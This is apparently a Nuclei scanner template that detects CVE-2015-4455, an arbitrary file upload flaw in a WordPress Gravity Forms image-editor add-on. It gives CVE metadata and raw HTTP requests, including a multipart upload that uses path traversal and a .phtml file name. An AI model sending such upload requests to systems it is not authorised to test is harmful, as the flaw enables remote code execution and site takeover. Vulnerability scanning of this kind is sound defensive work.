id: CVE-2015-4455

info:
  name: WordPress Plugin Aviary Image Editor Addon For Gravity Forms 3.0 Beta - Arbitrary File Upload
  author: MaStErChO
  severity: critical
  description: |
    Unrestricted file upload vulnerability in includes/upload.php in the Aviary Image Editor Add-on For Gravity Forms plugin 3.0 beta for WordPress allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in wp-content/uploads/gform_aviary.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2015-4455
    - http://packetstormsecurity.com/files/132256/WordPress-Aviary-Image-Editor-Add-On-For-Gravity-Forms-3.0-Beta-Shell-Upload.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2015-4455
    cwe-id: CWE-434
    epss-score: 0.28491
    epss-percentile: 0.96807
    cpe: cpe:2.3:a:aviary_image_editor_add-on_for_gravity_forms_project:aviary_image_editor_add-on_for_gravity_forms:*:beta:*:*:*:wordpress:*:*
  metadata:
    vendor: aviary_image_editor_add-on_for_gravity_forms_project
    product: aviary_image_editor_add-on_for_gravity_forms
    framework: wordpress
  tags: cve,cve2015,packetstorm,intrusive,file-upload
variables:
  filename: '{{rand_base(7, "abc")}}'

http:
  - raw:
      - |
        GET /?gf_page=upload HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /?gf_page=upload HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=a54906fe12c504cb01ca836d062f82fa

        --a54906fe12c504cb01ca836d062f82fa
        Content-Disposition: form-data; name="field_id"

        3
        --a54906fe12c504cb01ca836d062f82fa
        Content-Disposition: form-data; name="form_id"

        1
        --a54906fe12c504cb01ca836d062f82fa
        Content-Disposition: form-data; name="gform_unique_id"

        ../../../
        --a54906fe12c504cb01ca836d062f82fa
        Content-Disposition: form-data; name="name"

        {{filename}}.phtml
        --a54906fe12c504cb01ca836d062f82fa
        Content-Disposition: form-data; name="file"; filename="{{filename}}.jpg"
        Content-Type: text/html

        {{randstr}}
        --a54906fe12c504cb01ca836d062f82fa--

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1, "Failed to upload file")'
          - 'status_code_2 == 200'
          - 'contains(body_2, "uploaded_filename\":\"{{filename}}.jpg")'
        condition: and
# digest: 4b0a0048304602210086997acf11c57218a01b0591b45c9e1e9e0171e8f12c848b7e95c91d35edf190022100973637bca29c3c89a004d205adfe81cc82708d8f58f0d0702faed7113ffcf973:922c64590222798bb761d5b6d8e72950